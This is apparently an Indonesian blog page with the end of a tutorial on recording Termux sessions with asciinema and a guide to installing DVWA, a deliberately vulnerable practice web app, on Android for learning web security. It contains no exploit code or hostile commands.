Untuk menginstall asciinema, ketikan perintah/command seperti diatas itu. Simpel kan?

Nah jika sudah terinstall, berikut ini saya akan memberikan sedikit penjelesan dari mulai mengenai fungsi, dan cara menggunakan asciinema di termux.

Paduan cara menggunakan Asciinema di Termux

Disini saya akan menjelaskan fungsi-fungsi dari command line berikut ini:

1. asciinema rec demo.cast

Perintah ini untuk memulai merekam aktivitas di terminal, untuk berhenti merekam ketikan perintah seperti berikut exit atau CTRL+D.

File demo.cast ini adalah hasil dari kamu merekam aktivitas di terminal yang kita simpan. Kamu juga bisa mengubah nama file tersebut sesuai dengan keinginan kalian.

2. asciinema play demo.cast

Jika kita sudah tahu cara merekam, selanjutnya perintah ini bertujuan untuk play/memutar hasil dari rekaman yang sudah disimpan secara lokal.

3. asciinema -h

Mungkin jika kurang mengerti atau sekedar melihat perintah apa saja yang terdapat didalam asciinema, kamu bisa ketikan perintah help ya.

#Demo
Berikut ini adalah demo dari hasil rekaman menggunakan asciinema yang sudah saya coba praktekan langsung di termux.



Oh iya, jika kamu punya saran atau masukan bolehlah kamu berbagi di kolom komentar yang sudah disediakan di bawah ini.

Demikian tulisan sederhana saya ini, tentang bagaimana cara merekam aktivitas di termux menggunakan asciinema, ya semoga bermanfaat buat kalian semua.

Terimakasih, ngopi rung? Ngopi yuk hehe!

Belajar Keamanan Web Dengan Tools DVWA di Android

By On 4:02:00 AM

Pada kesempatan kali ini saya akan coba berbagi tutorial belajar web security dengan mengunakan tools DVWA.

Sebelum melanjutkan ke tutorial berikutnya, saya akan menjelelaskan apa itu DVWA.
Jadi gini DVWA atau kepanjanganya Damn Vulnerable Web Application adalah sebuah website yang sudah dirancang sedemikian rupa sehingga memiliki banyak celah keamanan untuk di exploitasi.

Dari fitur berbagai celah keamanan nya diantaranya ada Brute Force, Command Injection, CSRF, File Inclusion, File Upload, Insecure CAPTCHA, SQL Injection, SQL Injection (Blind), XSS (Reflected), XSS (Stored).
Ok jadi kurang lebih penjelasan atau pengertian dari dvwa seperti itu.

Tools DVWA ini nantinya akan kita gunakan untuk mempelajari keamanan sebuah website dengan berbagai teknik tanpa merusak system milik orang lain.
Dan untuk bisa mengunakan tools ini kita harus memiliki web server,  jadi simak saja tutorial install dvwa berikut ini...

#Cara Setup Tools DVWA

1. Di tutorial ini untuk menjalankan web server yang nantinya untuk install DVWA. Saya mengunakan Bit Web Server, tapi kalo kalian mau mengunakan yang lain boleh-boleh aja sih.
2. Setelah selesai download aplikasi bit web server kemudian langsung install.
3. Download file DVWA pada link berikut ini https://github.com/ethicalhack3r/DVWA/archive/v1.9.zip
4. Selanjutnya extrac file DVWA-1.9.zip dan pindahkan pada folder www.
5. Pergi ke folder www/DVWA-1.9/config/ lalu cari file config.inc.php habis itu cari baris kode seperti ini $_DVWA[ 'db_password' ] = 'p@ssw0rd'; kemudian hapus 'p@ssw0rd' lalu save.
6. Buka aplikasi Bit Web Server kemudian aktifkan web server, database server dan klik localhost pilih browser sesuai kalian lalu klik folder DVWA-1.9.
7. Nah tinggal setup kemudian klik Create / Reset Database

Setelah semua proses setup dan konfigurasi berhasil, nanti kita akan diarahkan ke halaman login.
Silahkan login dengan akun default dari DVWA yaitu:
User: admin
Paswword: password

Jika sukses maka nanti akan seperti pada tampilan gambar berikut ini...


Selanjutnya tingal dipelajari, disitu ada berbagai teknik Hacking sesuai apa yang sudah saya sebutkan tadi tinggal pilih mana yang mau di pelajari. Apabila kalian kesulitan saat belajar penetrasi, DVWA juga meberikan link informasi yang berkaitan dengan materi yang sedang anda pelajari.


Sekian dari saya pada artikel install DVWA kali ini, apabila kalian masih ada yang kurang mengerti silahkan tanyakan pada kolom komentar.

Haply learning and reading, Semoga bermanfaat!

Contact Form

Name

Email *

Message *